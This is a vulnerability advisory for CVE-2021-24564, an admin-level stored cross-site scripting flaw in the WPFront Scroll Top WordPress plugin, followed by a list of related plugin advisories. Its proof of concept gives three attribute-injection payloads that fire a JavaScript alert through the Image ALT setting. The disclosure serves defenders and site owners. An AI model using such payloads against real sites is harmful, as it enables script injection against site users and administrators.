WPFront Scroll Top < 2.0.6.07225 – Admin+ Stored XSS | CVE 2021-24564 | Plugin Vulnerabilities

Description

The plugin does not sanitise or escape its Image ALT setting before outputting it attributes, leading to an Authenticated Stored Cross-Site Scripting issues even when the unfiltered_html capability is disallowed.

Proof of Concept

Put the one of the payload below in the Image ALT setting of the plugin:

The XSS will be triggered in the plugin's setting page and/or frontend depending on the payload used

" style=animation-name:rotation onanimationstart=alert(/XSS/)//
" onmouseover=alert(/XSS/) "
" style=animation-name:twentytwentyone-close-button-transition onanimationend=alert(/XSS/)//

Affects Plugins

wpfront-scroll-top

Fixed in 2.0.6.07225

References

CVE

URL

https://www.hackpertise.com/cve/4-cve-2021-24564/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Asif Nawaz Minhas

Submitter

Asif Nawaz Minhas

Verified

Yes

WPVDB ID

b25af0e1-392f-4305-ad44-50e64ef3dbdf

Timeline

Publicly Published

2021-07-26 (about 4 years ago)

Added

2021-07-26 (about 4 years ago)

Last Updated

2023-04-12 (about 2 years ago)

Other

Published

Title

Published

2024-06-10

Title

SiteOrigin Widgets Bundle < 1.62.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via SiteOrigin Blog Widget

Published

2025-03-24

Title

Include URL <= 0.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-06-02

Title

Vayu Blocks < 1.3.2 - Missing Authorization to Authenticated (Subscriber+) Stored Cross-Site Scripting via containerWidth Parameter

Published

2024-04-30

Title

Jeg Elementor Kit < 2.6.5 - Contributor+ Stored XSS via Elementor Widget URL Custom Attributes

Published

2024-03-25

Title

SEO Backlink Monitor < 1.6.0 - Reflected Cross-Site Scripting